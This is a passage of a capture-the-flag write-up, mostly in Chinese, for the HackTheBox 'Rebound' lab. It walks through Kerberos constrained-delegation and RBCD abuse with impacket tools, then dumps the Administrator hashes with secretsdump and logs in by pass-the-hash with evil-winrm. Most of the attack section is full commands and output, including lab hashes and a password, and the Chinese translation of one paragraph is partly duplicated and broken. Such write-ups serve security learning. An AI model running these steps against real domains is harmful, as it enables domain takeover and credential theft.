/usr/local/bin/findDelegation.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250401.172759.352695f1', 'findDelegation.py')
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No

Delegation without protocol transition means that is not possible for us to abuse it with a classic

“getST”. Attempting to do so leads to a Kerberos error:

This happens because of the lack of Protocol Transition, which means that the S4U2Self step

does not produce a forwardable ticket, which causes the S4U2proxy step to fail.

In essence, the Service for User to Self (S4U2self) protocol enables a service to request a Service

Ticket on another user’s behalf, but for its own use. Conversely, the Service for User to Proxy

(S4U2proxy) protocol allows a service to request a Service Ticket on another user’s behalf, but

for a different service.

We can verify this by performing S4U2Self and checking the resulting ticket.

没有协议转换的委托意味着我们不可能用经典的

“getST”。尝试这样做会导致 Kerberos 错误:

出现这种情况是因为缺乏协议转换,这意味着 S4U2Self 步骤

无法生成可转发的票据,从而导致 S4U2proxy 步骤失败。

从本质上讲,用户对自己的服务(S4U2self)协议使服务能代表另一个用户请求服务票证。

票证。相反,用户对代理服务

(S4U2proxy) 协议允许服务代表另一个用户申请服务票证,但用于不同的服务。

为不同的服务申请服务票证。

我们可以通过执行 S4U2Self 并检查生成的票据来验证这一点。

所以需要打两次委托,一次是本身,一次是服务。首先申请 delegator$的 TGT

1
2
3
4
5
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getTGT.py -dc-ip 10.10.11.231 rebound.htb/delegator\$ -hashes ':d0700a7a8e202cbad887ebf92e4d1080'
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in delegator$.ccache

打 RBCD。这个用法很熟悉,但是不太懂原理,找时间看看。

1
2
3
4
5
6
7
8
9
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# rbcd.py rebound.htb/delegator\$ -no-pass -k -delegate-to delegator\$ -delegate-from ldap_monitor -dc-ip 10.10.11.231 -action write -use-ldaps
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)

拿到 ccache

1
2
3
4
5
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getTGT.py -dc-ip 10.10.11.231 rebound.htb/ldap_monitor:'1GR8t@$$4u'
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in ldap_monitor.ccache
1
export KRB5CCNAME=ldap_monitor.ccache

获取 ST spn 指定目标服务的 服务主体名称(SPN),即要请求票据的服务。cifs 是 Common Internet File System 的缩写,对应 SMB 文件共享服务,通常用于访问域控的共享资源(如 C$)这个可以随便写,一般写已有的服务。

1
getST.py -spn browser/dc01.rebound.htb -impersonate 'dc01$' rebound.htb/ldap_monitor -k -no-pass

打不成把前面的重新执行下再试试。

1
2
3
4
5
6
getTGT.py -dc-ip 10.10.11.231 rebound.htb/delegator\$ -hashes ':d0700a7a8e202cbad887ebf92e4d1080'
export KRB5CCNAME=delegator\$.ccache
rbcd.py rebound.htb/delegator\$ -no-pass -k -delegate-to delegator\$ -delegate-from ldap_monitor -dc-ip 10.10.11.231 -action write -use-ldaps
getTGT.py -dc-ip 10.10.11.231 rebound.htb/ldap_monitor:'1GR8t@$$4u'
export KRB5CCNAME=ldap_monitor.ccache

然后在我印象中这个好像要多打几次。

1
2
3
4
5
6
7
8
9
10
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getST.py -spn browser/dc01.rebound.htb -impersonate "dc01$" rebound.htb/ldap_monitor -k -no-pass
/usr/local/bin/getST.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250401.172759.352695f1', 'getST.py')
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

导入

1
export KRB5CCNAME=dc01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

但是他这里多了一步申请票据,看了别人的 wp,官方 wp 有点没看懂。

这里先申请自服务票据,再申请代理票据。Kerberos 每个票据都是为服务分发的,没有双阶段,服务可以直接请求其他服务,会导致滥用,因此要先请求自身服务的票据,再使用代理票据代表用户请求其他服务的票据,限制安全,确保权限边界。

服务 A 必须首先证明自身合法性,才能代表用户请求访问预先授权的特定服务(如 SQL、SMB),而非任意服务。

1
2
3
4
5
6
7
8
9
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getST.py -spn http/dc01.rebound.htb -impersonate dc01\$ -additional-ticket dc01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache -hashes :d0700a7a8e202cbad887ebf92e4d1080 -no-pass -k -dc-ip 10.10.11.231 rebound.htb/delegator\$
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@http_dc01.rebound.htb@REBOUND.HTB.ccache

转储密钥 secretsdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿escorpion)-[~/htb/Rebound]
└─# secretsdump.py dc01.rebound.htb -k -just-dc-user administrator
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250401.172759.352695f1', 'secretsdump.py')
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...

evil-winrm 连接进去

1
evil-winrm -i rebound.htb -u administrator -H 176be138594933bb67db3b2572fc91b8

总结

  • RID 枚举
  • AS-REP-roasting
  • Kerberoasting
  • rbcd

Ref